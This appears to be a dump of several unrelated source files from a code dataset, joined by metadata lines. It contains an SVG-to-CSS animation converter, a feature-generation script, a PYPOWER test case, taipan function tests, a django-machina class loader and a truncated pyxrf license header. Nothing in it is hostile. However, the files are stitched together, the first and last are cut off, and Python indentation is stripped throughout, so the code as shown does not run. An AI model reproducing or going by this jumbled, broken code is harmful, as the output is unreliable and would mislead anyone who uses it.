# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import with_statement
import os
import sys
from lxml import etree
from copy import deepcopy
from parser import *
from StringIO import StringIO
import logging
import simplejson as json
import re
from collections import deque
from copy import deepcopy
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S')
class CssElement(dict):
def __init__(self, title=''):
super(CssElement, self).__init__()
self.common_element = {
'position' : ['position', 'absolute'],
'transform': ['-webkit-transform', None],
'origin' : ['-webkit-transform-origin', '0.0px 0.0px'],
}
self.animation_element = {
'name' : ['-webkit-animation-name', None],
'timing' : ['-webkit-animation-timing-function', 'linear'],
'count' : ['-webkit-animation-iteration-count', 'infinite'],
'duration' : ['-webkit-animation-duration', None],
}
self.shape_element = {
'left' : ['left' , None],
'top' : ['top' , None],
'width' : ['width' , None],
'height' : ['height' , None],
}
self.title = title
self.sp = '\n' # splitter
def __str__(self):
content = self.sp.join(['%s: %s;' % (k,v) for k,v in self.iteritems()])
return '%s {%s%s%s}%s' % (self.title, self.sp, content, self.sp, self.sp)
def add_anims_element(self, key, anim_length, has_anim_name):
self.animation_element['name'][1] = key
self.animation_element['duration'][1] = '%fs'%(float(anim_length)/12.0)
if not has_anim_name:
del self.animation_element['name']
self.update(self.animation_element.values())
self.update(self.common_element.values())
def add_shape_element(self, shape_key, shape_table):
def calc_twips_to_pixel(twips):
return '%dpx' % int(round(float(twips)/20))
shape = shape_table[shape_key]
self.shape_element['left'][1] = calc_twips_to_pixel(shape.left)
self.shape_element['top'][1] = calc_twips_to_pixel(shape.top)
self.shape_element['width'][1] = calc_twips_to_pixel(shape.width)
self.shape_element['height'][1] = calc_twips_to_pixel(shape.height)
self.update(self.shape_element.values())
del self.common_element['origin']
def add_origin_element(self, matrix):
self.common_element['transform'][1] = matrix
self.update(self.common_element.values())
class SvgShape(object):
def __init__(self, elem):
self.obj = elem[0]
self.hash = elem[1]
self.left = int(elem[2])
self.top = int(elem[3])
self.width = int(elem[4])
self.height = int(elem[5])
self.symbol = ''
self.edges = []
self.defs =[]
def filename(self, dir_path='.'):
return os.path.join(dir_path, '%s_%s.svg' % (self.obj, self.hash))
class SvgTransform(Transform):
def __init__(self, attrib):
super(SvgTransform,self).__init__()
values = dict([(k,float(attrib[k])) if k in attrib else (k,None) for k in self.MATRIX])
self.set_items(values)
if 'depth' in attrib:
self.depth = int(attrib['depth'])
if 'ctf' in attrib:
self.ctf = ColorTransform([int(ctf.strip()) for ctf in attrib['ctf'].strip('[]').split(',') if ctf.strip().lstrip('-').isdigit()])
if 'clipDepth' in attrib:
self.clipDepth = int(attrib['clipDepth'])
if 'visible' in attrib and attrib['visible'] == 'False':
self.visible = False
def __eq__(self, other):
return [self.sx, self.sy, self.wx, self.wy, self.tx, self.ty, self.get_opacity()]==other
def write_matrix(self):
return self._shorten('matrix(%.6f,%.6f,%.6f,%.6f,%.6f,%.6f)' % self.get_matrix())
def write_matrix3d(self):
return self._shorten('matrix3d(%.6f,%.6f,0,0,%.6f,%.6f,0,0,0,0,1,0,%.6f,%.6f,0,1)' % (self.sx, self.wx, self.wy, self.sy, self.tx/20, self.ty/20))
def write_webkit_transform(self):
return self._shorten('-webkit-transform: %s;' % self.write_matrix3d())
def _shorten(self, str):
return str.replace('.000000', '.0')
def get_opacity(self):
opacity = 1.0
if not self.visible:
opacity = 0.0
else:
if len(self.ctf) == 8:
c = Color([0,0,0,256])
c.transform(self.ctf)
opacity = (float(c.a) / 256.0)
return opacity
def write_visible(self):
return self._shorten('opacity: %.6f;' % self.get_opacity())
class AnimationManager(object):
def __init__(self, dir_path, basefilename):
self.dir_path = dir_path
self.shapes_filepath = self._get_path('shapes')
self.animation_filepath = self._get_path('animation.xml')
self.structure_filepath = self._get_path('structure.xml')
self.cssfilepath = os.path.join('.', basefilename + '.css')
self.htmlfilepath = os.path.join('.', basefilename + '.html')
self.xmlfilename = os.path.basename(basefilename.replace('.svg',''));
def _get_path(self, filename):
return os.path.join(self.dir_path, filename)
def load_shapes(self):
with open(self.shapes_filepath, 'r') as f:
return self.get_shapes(f.readlines())
def get_shapes(self, lines):
shape_table = {}
for line in lines:
elems = line.split(' ')
if len(elems) == 6: # 'shapes'
shape_table[elems[0]] = SvgShape(elems)
return shape_table
def load_animation(self):
root = self._parse_xml(self.animation_filepath)
return self.get_animation(root)
def get_animation(self, root):
anim_table = {}
for anim in root.xpath('//animation'):
key = anim.attrib['key'][:-2]
frames = anim.findall('frame')
anim_table[key] = [SvgTransform(frame.attrib) for frame in frames]
return anim_table
def load_structure(self, shape_table, parser_shapes):
root = self._parse_xml(self.structure_filepath)
return self.get_structure(root, shape_table, parser_shapes)
def get_structure(self, root, shape_table, anim_table, ctfsArray, parser_shapes, mcname=None, key_prefix=""):
def get_parent_key(elem):
parent = elem.getparent()
if parent is not None and parent.attrib.has_key('class'):
p_attrib_cls = parent.attrib['class']
s = re.search('obj\d+', p_attrib_cls)
if s is not None:
return s.group()
else:
return ''
def update_elem(elem, key, name, hasClipDepth):
elem.tag = 'div'
elem.attrib.clear()
elem.attrib['class'] = key
if name is not None :
elem.attrib['id'] = name
if hasClipDepth:
elem.attrib['style'] = 'display:none;'
structure_table = {}
if mcname is None:
root_elem = root
else:
r = root.xpath('//part[@name="%s"]'%mcname)
if r is None:
root_elem = root
else:
root_elem = r[0]
for elem in root.xpath('//part'):
if 'key' in elem.attrib:
key = elem.attrib['key']
objId = LUtil.objectID_from_key(key)
depth = elem.attrib['depth']
hasClipDepth = 'clipDepth' in elem.attrib
name = elem.attrib['name'] if 'name' in elem.attrib else None
ctf = json.loads(elem.attrib['ctf'])
if len(ctf) > 1:
ctfsArray.append({key:ctf})
key_depth = LUtil.make_key_string(objId, prefix=key_prefix, suffix=depth)
structure_table[key_depth] = SvgTransform(elem.attrib)
update_elem(elem, key_depth, name, hasClipDepth)
k = objId[3:]
if (len(elem) == 0) and (k in parser_shapes):
shape_key = LUtil.make_key_string(objId, prefix=key_prefix, suffix='shape')
parent_key = get_parent_key(elem)
childdiv = etree.Element('div')
childdiv.set('class', shape_key)
structure_table[shape_key] = SvgTransform(childdiv.attrib)
svgelem = Parser.str_shape_as_svg(parser_shapes[k], ctfsArray, parent_key)
childdiv.append(svgelem)
elem.append(childdiv)
structure_tree = deepcopy(root_elem)
return structure_table, structure_tree
def _parse_xml(self, filepath):
with open(filepath, 'r') as f:
return etree.parse(f)
return None
def _remove_deplicated_keyframes(self, anim_elements):
anim_buffer = deque()
result = []
for percent, transform in anim_elements:
anim_buffer.append((percent, transform))
if len(anim_buffer) == 3:
if anim_buffer[0][1] == anim_buffer[1][1] and anim_buffer[0][1] == anim_buffer[2][1]:
anim_buffer = deque((anim_buffer[0], anim_buffer[2]))
else:
result.append(anim_buffer.popleft())
result.extend(list(anim_buffer))
return result
def _interpolate_keyframes(self, anim_elements, eps=0.0001):
result = []
old_transform = None
for i, (percent, transform) in enumerate(anim_elements):
if old_transform is not None:
if (not old_transform.visible and transform.visible):
temp_transform = deepcopy(transform)
temp_transform.visible = old_transform.visible
result.append((percent - eps, temp_transform))
elif (old_transform.visible and not transform.visible):
result.append((percent - eps, old_transform))
result.append((percent, transform))
old_transform = transform
if len(result) > 0:
result.append((100.0, result[0][1])) # 100% animation
return result
def _make_keyframes(self, anim_table, key_prefix='', sp='\n'):
keyframes = []
for key, value in anim_table.iteritems():
anim_length = len(value)
anim_elements = [((float(i*100)/float(anim_length)), a) for i,a in enumerate(value)]
anim_list = ['%f%% { %s %s }' % (percent, a.write_webkit_transform(), a.write_visible()) for percent, a in self._interpolate_keyframes(self._remove_deplicated_keyframes(anim_elements))]
anim = sp.join(anim_list)
keyframes.append(sp.join(['@-webkit-keyframes %s {'%(key), anim, '}']))
return (sp+sp).join(keyframes)
def _make_transform(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n'):
result = []
for key, structure in structure_table.iteritems():
elem = CssElement(title='.%s'%key)
transform = ('-webkit-transform', structure.write_matrix())
if key in anim_table:
anim_length = len(anim_table[key])
elem.add_anims_element(key, anim_length, has_anim_name)
shape_key = LUtil.objectID_from_key(key)
if key.endswith('shape') and shape_key in shape_table:
elem.add_shape_element(shape_key, shape_table)
elem.add_origin_element(structure.write_matrix())
result.append(str(elem))
return (sp+sp).join(result)
def write_html(self, structure_tree, cssfilepath):
template = '''<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja">
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8"></meta>
<link href="%s" type="text/css" rel="stylesheet"></link>
<title>lightning</title>
</head>
<body>
%s
</body>
</html>
'''
html = template % (cssfilepath, etree.tostring(structure_tree, pretty_print=True))
return html
def write_div(self, structure_tree):
html = "%s" % (etree.tostring(structure_tree, pretty_print=True))
return html
def write_css(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n\n'):
elem = CssElement(title='div')
css = sp.join([self._make_keyframes(anim_table, key_prefix), self._make_transform(structure_table, shape_table, anim_table, key_prefix, has_anim_name)])
return 'svg { display:block; }\n' + css
def _write(self, filepath, content):
with open(filepath, 'w') as f:
f.write(content)
| mit | -3,026,379,057,328,387,000 | 39.092697 | 197 | 0.577664 | false |
jayantk/jklol | scripts/sequence/generate_emission_features.py | 1 | 1090 | #!/usr/local/lib/python2.6
import re
import sys
filename = sys.argv[1]
def generate_string_features(word, label):
dict = {}
'''
patterns = ['\d$', '\d\d$', '\d\d\d+$', '\d?\d?:\d\d$',
'[0-9:]+$', '[A-Z]', '[A-Z]$', '[A-Z][A-Z]$',
'[A-Z]+$', '[^0-9A-Za-z]+$', '[^0-9]+$', '[A-Za-z]+$',
'[a-z]+$']
for pattern in patterns:
if re.match(pattern, word):
dict['regex=' + pattern + '_label=' + label] = 1
'''
dict['bias_label=' + label] = 1
dict['word=' + word.lower() + '_label=' + label] = 1
return dict
words = set()
labels = set()
with open(filename, 'r') as f:
for line in f:
chunks = line.strip().split(" ")
for i in range(0, len(chunks), 2):
words.add(chunks[i].strip())
labels.add(chunks[i + 1].strip())
for word in words:
for label in labels:
features = generate_string_features(word, label)
for feature in features.keys():
print "%s@#@#@%s@#@#@%s@#@#@%d" % (word, label, feature, features[feature])
| bsd-2-clause | 780,676,244,806,136,700 | 26.25 | 87 | 0.478899 | false |
praba230890/PYPOWER | pypower/t/t_case_ext.py | 2 | 4105 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Case data in external format.
"""
from numpy import array, ones, arange, r_
def t_case_ext():
"""Case data in external format used to test C{ext2int} and C{int2ext}.
"""
ppc = {}
## PYPOWER Case Format : Version 2
ppc['version'] = '2'
##----- Power Flow Data -----##
## system MVA base
ppc['baseMVA'] = 100.0
## bus data
# bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin
ppc['bus'] = array([
[1, 3, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[2, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[30, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[4, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[5, 1, 90, 30, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[20, 4, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[6, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[7, 1, 100, 35, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[8, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[9, 1, 125, 50, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9]
])
## generator data
# bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,
# Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf
ppc['gen'] = array([
[30, 85, 0, 300, -300, 1, 100, 1, 270, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 163, 0, 300, -300, 1, 100, 1, 300, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[20, 20, 0, 300, -300, 1, 100, 1, 200, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 300, -300, 1, 100, 1, 250, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
], float)
## branch data
# fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax
ppc['branch'] = array([
[1, 4, 0, 0.0576, 0, 0, 250, 250, 0, 0, 1, -360, 360],
[4, 5, 0.017, 0.092, 0.158, 0, 250, 250, 0, 0, 1, -360, 360],
[5, 6, 0.039, 0.17, 0.358, 150, 150, 150, 0, 0, 1, -360, 360],
[30, 6, 0, 0.0586, 0, 0, 300, 300, 0, 0, 1, -360, 360],
[6, 7, 0.0119, 0.1008, 0.209, 40, 150, 150, 0, 0, 1, -360, 360],
[7, 8, 0.0085, 0.072, 0.149, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 20, 0, 0.1, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 2, 0, 0.0625, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 9, 0.032, 0.161, 0.306, 250, 250, 250, 0, 0, 1, -360, 360],
[9, 4, 0.01, 0.085, 0.176, 250, 250, 250, 0, 0, 1, -360, 360]
])
##----- OPF Data -----##
## area data
# area refbus
ppc['areas'] = array([
[2, 20],
[1, 5]
], float)
## generator cost data
# 1 startup shutdown n x1 y1 ... xn yn
# 2 startup shutdown n c(n-1) ... c0
ppc['gencost'] = array([
[2, 0, 0, 2, 15, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2500, 200, 5500, 250, 7250],
[2, 0, 0, 2, 20, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2000, 200, 4403.5, 270, 6363.5]
])
ppc['A'] = array([
[1, 2, 3, 4, 5, 0, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 17, 18, 19, 20, 21, 22, 0, 24, 25, 26, 0, 28, 29, 30],
[2, 4, 6, 8, 10, 0, 14, 16, 18, 20, 22, 24, 26, 28, 30, 0, 34, 36, 38, 40, 42, 44, 0, 48, 50, 52, 0, 56, 58, 60]
], float)
ppc['N'] = array([
[30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1],
[60, 58, 56, 54, 52, 50, 48, 46, 44, 42, 40, 38, 36, 34, 32, 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2],
], float)
ppc['xbus'] = arange(100, dtype=float).reshape((10, 10))
ppc['xgen'] = arange(16, dtype=float).reshape((4, 4))
ppc['xbranch'] = ppc['xbus'].copy()
ppc['xrows'] = r_[ppc['xbranch'][:, :4], ppc['xgen'], ppc['xbus'][:, :4], -ones((2, 4))]
ppc['xcols'] = ppc['xrows'].T
ppc['x'] = { 'more': ppc['xgen'] }
return ppc
| bsd-3-clause | -4,254,840,702,159,437,000 | 40.887755 | 125 | 0.436541 | false |
Xion/taipan | tests/test_functional/test_functions.py | 1 | 11928 | """
Tests for the .functional.functions module.
"""
from collections import namedtuple
from contextlib import contextmanager
from taipan.testing import TestCase
import taipan.functional.functions as __unit__
# Constant functions
class _ConstantFunction(TestCase):
EMPTY_TUPLE = ()
EMPTY_LIST = []
DIFFERENT_EMPTY_LIST = []
LIST = list(range(5))
LIST_COPY = list(LIST)
EMPTY_DICT = {}
DIFFERENT_EMPTY_DICT = {}
DICT = dict(zip('abcde', range(5)))
DICT_COPY = dict(DICT)
OBJECT = object()
DIFFERENT_OBJECT = object()
class Identity(_ConstantFunction):
def test_values(self):
identity = __unit__.identity()
self.assertIsNone(identity(None))
self.assertIs(0, identity(0))
self.assertIs(self.EMPTY_TUPLE, identity(self.EMPTY_TUPLE))
def test_empty_lists(self):
identity = __unit__.identity()
self.assertIs(self.EMPTY_LIST, identity(self.EMPTY_LIST))
self.assertIsNot(self.DIFFERENT_EMPTY_LIST, identity(self.EMPTY_LIST))
def test_lists(self):
identity = __unit__.identity()
self.assertIs(self.LIST, identity(self.LIST))
self.assertIsNot(self.LIST_COPY, identity(self.LIST))
def test_empty_dicts(self):
identity = __unit__.identity()
self.assertIs(self.EMPTY_DICT, identity(self.EMPTY_DICT))
self.assertIsNot(self.DIFFERENT_EMPTY_DICT, identity(self.EMPTY_DICT))
def test_dicts(self):
identity = __unit__.identity()
self.assertIs(self.DICT, identity(self.DICT))
self.assertIsNot(self.DICT_COPY, identity(self.DICT))
def test_object(self):
identity = __unit__.identity()
self.assertIs(self.OBJECT, identity(self.OBJECT))
self.assertIsNot(self.DIFFERENT_OBJECT, identity(self.OBJECT))
class Const(_ConstantFunction):
def test_values(self):
self.assertIsNone(__unit__.const(None)())
self.assertIs(0, __unit__.const(0)())
self.assertIs(self.EMPTY_TUPLE, __unit__.const(self.EMPTY_TUPLE)())
def test_empty_lists(self):
empty_list = __unit__.const(self.EMPTY_LIST)
self.assertIs(self.EMPTY_LIST, empty_list())
self.assertIsNot(self.DIFFERENT_EMPTY_LIST, empty_list())
def test_lists(self):
list_ = __unit__.const(self.LIST)
self.assertIs(self.LIST, list_())
self.assertIsNot(self.DIFFERENT_EMPTY_LIST, list_())
def test_empty_dicts(self):
empty_dict = __unit__.const(self.EMPTY_DICT)
self.assertIs(self.EMPTY_DICT, empty_dict())
self.assertIsNot(self.DIFFERENT_EMPTY_DICT, empty_dict())
def test_dicts(self):
dict_ = __unit__.const(self.DICT)
self.assertIs(self.DICT, dict_())
self.assertIsNot(self.DICT_COPY, dict_())
def test_object(self):
object_ = __unit__.const(self.OBJECT)
self.assertIs(self.OBJECT, object_())
self.assertIsNot(self.DIFFERENT_OBJECT, object_())
class PredefinedConstantFunctions(_ConstantFunction):
def test_true(self):
self._assertConstantFunction(__unit__.true(), self.assertTrue)
def test_false(self):
self._assertConstantFunction(__unit__.false(), self.assertFalse)
def test_none(self):
self._assertConstantFunction(__unit__.none(), self.assertIsNone)
def test_zero(self):
self._assertConstantFunction(__unit__.zero(), self.assertZero)
def test_one(self):
self._assertConstantFunction(__unit__.one(),
lambda res: self.assertEquals(1, res))
def test_empty(self):
self._assertConstantFunction(__unit__.empty(), self.assertEmpty)
# Utility functions
def _assertConstantFunction(self, func, assertion):
assertion(func())
assertion(func("extraneous positional argument"))
assertion(func(foo="extraneous keyword argument"))
assertion(func("extraneous positional argument",
foo="extraneous keyword argument"))
# Unary functions
class AttrFunc(TestCase):
CLASS = namedtuple('Foo', ['foo', 'bar'])
SINGLE_NESTED_OBJECT = CLASS(foo=1, bar='baz')
DOUBLY_NESTED_OBJECT = CLASS(foo=CLASS(foo=1, bar=2), bar='a')
DEFAULT = 42
def test_no_args(self):
with self.assertRaises(TypeError):
__unit__.attr_func()
def test_none(self):
with self.assertRaises(TypeError):
__unit__.attr_func(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.attr_func(object())
def test_string__empty(self):
with self._assertAttributeNameValueError():
__unit__.attr_func('')
def test_string__with_spaces(self):
with self._assertAttributeNameValueError():
__unit__.attr_func('foo bar')
def test_string__number(self):
with self._assertAttributeNameValueError():
__unit__.attr_func('42')
def test_single_attr__good(self):
func = __unit__.attr_func('foo')
self.assertEquals(
self.SINGLE_NESTED_OBJECT.foo, func(self.SINGLE_NESTED_OBJECT))
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo, func(self.DOUBLY_NESTED_OBJECT))
def test_single_attr__bad(self):
func = __unit__.attr_func('doesnt_exist')
with self.assertRaises(AttributeError):
func(self.SINGLE_NESTED_OBJECT)
with self.assertRaises(AttributeError):
func(self.DOUBLY_NESTED_OBJECT)
def test_single_attr__with_dot(self):
func = __unit__.attr_func('foo.bar')
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo.bar, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__good(self):
func = __unit__.attr_func('foo', 'bar')
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo.bar, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__bad(self):
func = __unit__.attr_func('doesnt_exist', 'foo')
with self.assertRaises(AttributeError):
func(self.DOUBLY_NESTED_OBJECT)
def test_single_attr__good__with_default(self):
func = __unit__.attr_func('foo', default=self.DEFAULT)
self.assertEquals(
self.SINGLE_NESTED_OBJECT.foo, func(self.SINGLE_NESTED_OBJECT))
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo, func(self.DOUBLY_NESTED_OBJECT))
def test_single_attr__bad__with_default(self):
func = __unit__.attr_func('doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.SINGLE_NESTED_OBJECT))
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__good__with_default(self):
func = __unit__.attr_func('foo', 'bar', default=self.DEFAULT)
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo.bar, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__bad__with_default(self):
func = __unit__.attr_func('foo', 'doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_OBJECT))
# Utility functions
@contextmanager
def _assertAttributeNameValueError(self):
with self.assertRaises(ValueError) as r:
yield r
msg = str(r.exception)
self.assertIn("not", msg)
self.assertIn("valid", msg)
class KeyFunc(TestCase):
SINGLY_NESTED_DICT = dict(foo=1, bar='baz')
DOUBLY_NESTED_DICT = dict(foo=dict(foo=1, bar=2), bar='a')
DEFAULT = 42
def test_no_args(self):
with self.assertRaises(TypeError):
__unit__.key_func()
def test_none(self):
with self.assertRaises(TypeError):
__unit__.key_func(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.key_func(object())
def test_single_key__good(self):
func = __unit__.key_func('foo')
self.assertEquals(
self.SINGLY_NESTED_DICT['foo'], func(self.SINGLY_NESTED_DICT))
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo'], func(self.DOUBLY_NESTED_DICT))
def test_single_key__bad(self):
func = __unit__.key_func('doesnt_exist')
with self.assertRaises(LookupError):
func(self.SINGLY_NESTED_DICT)
with self.assertRaises(LookupError):
func(self.DOUBLY_NESTED_DICT)
def test_two_keys__good(self):
func = __unit__.key_func('foo', 'bar')
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo']['bar'],
func(self.DOUBLY_NESTED_DICT))
def test_two_keys__bad(self):
func = __unit__.key_func('doesnt_exist', 'foo')
with self.assertRaises(LookupError):
func(self.DOUBLY_NESTED_DICT)
def test_single_key__good__with_default(self):
func = __unit__.key_func('foo', default=self.DEFAULT)
self.assertEquals(
self.SINGLY_NESTED_DICT['foo'], func(self.SINGLY_NESTED_DICT))
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo'], func(self.DOUBLY_NESTED_DICT))
def test_single_key__bad__with_default(self):
func = __unit__.key_func('doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.SINGLY_NESTED_DICT))
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_DICT))
def test_two_keys__good__with_default(self):
func = __unit__.key_func('foo', 'bar', default=self.DEFAULT)
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo']['bar'],
func(self.DOUBLY_NESTED_DICT))
def test_two_keys__bad__with_default(self):
func = __unit__.key_func('foo', 'doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_DICT))
class Dotcall(TestCase):
INSTANCE_RETURN_VALUE = 42
CLASS_RETURN_VALUE = 13
ARGUMENT = 'foobar'
def test_no_args(self):
with self.assertRaises(TypeError):
__unit__.dotcall()
def test_none(self):
with self.assertRaises(TypeError):
__unit__.dotcall(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.dotcall(object())
def test_string__no_args__class_instance(self):
call = __unit__.dotcall('foo')
instance = self._create_class_instance()
self.assertEquals(Dotcall.INSTANCE_RETURN_VALUE, call(instance))
def test_string__no_args__class(self):
call = __unit__.dotcall('bar')
class_ = self._create_class()
self.assertEquals(Dotcall.CLASS_RETURN_VALUE, call(class_))
def test_string__no_args__module(self):
call = __unit__.dotcall(__unit__.true.__name__)
self.assertResultsEqual(__unit__.true(), call(__unit__))
def test_string__with_args__class_instance(self):
call = __unit__.dotcall('baz', self.ARGUMENT)
instance = self._create_class_instance()
self.assertEquals(self.ARGUMENT, call(instance))
def test_string__with_args__class(self):
call = __unit__.dotcall('qux', self.ARGUMENT)
class_ = self._create_class()
self.assertEquals(self.ARGUMENT, call(class_))
def test_string__with_args__module(self):
call = __unit__.dotcall(__unit__.const.__name__, self.ARGUMENT)
self.assertResultsEqual(__unit__.const(self.ARGUMENT), call(__unit__))
# Utility function
def _create_class(self):
class Class(object):
def foo(self):
return Dotcall.INSTANCE_RETURN_VALUE
@classmethod
def bar(cls):
return Dotcall.CLASS_RETURN_VALUE
def baz(self, arg):
return arg
@classmethod
def qux(cls, arg):
return arg
return Class
def _create_class_instance(self):
Class = self._create_class()
return Class()
| bsd-2-clause | -944,069,147,361,866,900 | 32.505618 | 79 | 0.617622 | false |
ellmetha/django-machina | machina/core/loading.py | 1 | 3900 | import sys
import traceback
from django.conf import settings
class AppNotFoundError(Exception):
pass
class ClassNotFoundError(Exception):
pass
def get_class(module_label, classname):
return get_classes(module_label, [classname, ])[0]
def get_classes(module_label, classnames):
""" Imports a set of classes from a given module.
Usage::
get_classes('forum.models', ['Forum', 'ForumReadTrack', ])
"""
app_label = module_label.split('.')[0]
app_module_path = _get_app_module_path(module_label)
if not app_module_path:
raise AppNotFoundError('No app found matching \'{}\''.format(module_label))
# Determines the full module path by appending the module label
# to the base package path of the considered application.
module_path = app_module_path
if '.' in app_module_path:
base_package = app_module_path.rsplit('.' + app_label, 1)[0]
module_path = '{}.{}'.format(base_package, module_label)
# Try to import this module from the related app that is specified
# in the Django settings.
local_imported_module = _import_module(module_path, classnames)
# If the module we tried to import is not located inside the machina
# vanilla apps, try to import it from the corresponding machina app.
machina_imported_module = None
if not app_module_path.startswith('machina.apps'):
machina_imported_module = _import_module(
'{}.{}'.format('machina.apps', module_label), classnames,
)
if local_imported_module is None and machina_imported_module is None:
raise AppNotFoundError('Error importing \'{}\''.format(module_path))
# Any local module is prioritized over the corresponding machina module
imported_modules = [
m for m in (local_imported_module, machina_imported_module) if m is not None
]
return _pick_up_classes(imported_modules, classnames)
def _import_module(module_path, classnames):
""" Tries to import the given Python module path. """
try:
imported_module = __import__(module_path, fromlist=classnames)
return imported_module
except ImportError:
# In case of an ImportError, the module being loaded generally does not exist. But an
# ImportError can occur if the module being loaded exists and another import located inside
# it failed.
#
# In order to provide a meaningfull traceback, the execution information can be inspected in
# order to determine which case to consider. If the execution information provides more than
# a certain amount of frames, this means that an ImportError occured while loading the
# initial Python module.
__, __, exc_traceback = sys.exc_info()
frames = traceback.extract_tb(exc_traceback)
if len(frames) > 1:
raise
def _pick_up_classes(modules, classnames):
""" Given a list of class names to retrieve, try to fetch them from the specified list of
modules and returns the list of the fetched classes.
"""
klasses = []
for classname in classnames:
klass = None
for module in modules:
if hasattr(module, classname):
klass = getattr(module, classname)
break
if not klass:
raise ClassNotFoundError('Error fetching \'{}\' in {}'.format(
classname, str([module.__name__ for module in modules]))
)
klasses.append(klass)
return klasses
def _get_app_module_path(module_label):
""" Given a module label, loop over the apps specified in the INSTALLED_APPS to find the
corresponding application module path.
"""
app_name = module_label.rsplit('.', 1)[0]
for app in settings.INSTALLED_APPS:
if app.endswith('.' + app_name) or app == app_name:
return app
return None
| bsd-3-clause | 3,359,601,575,584,082,400 | 34.779817 | 100 | 0.65641 | false |
ericdill/PyXRF | pyxrf/model/guessparam.py | 1 | 27631 | # ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
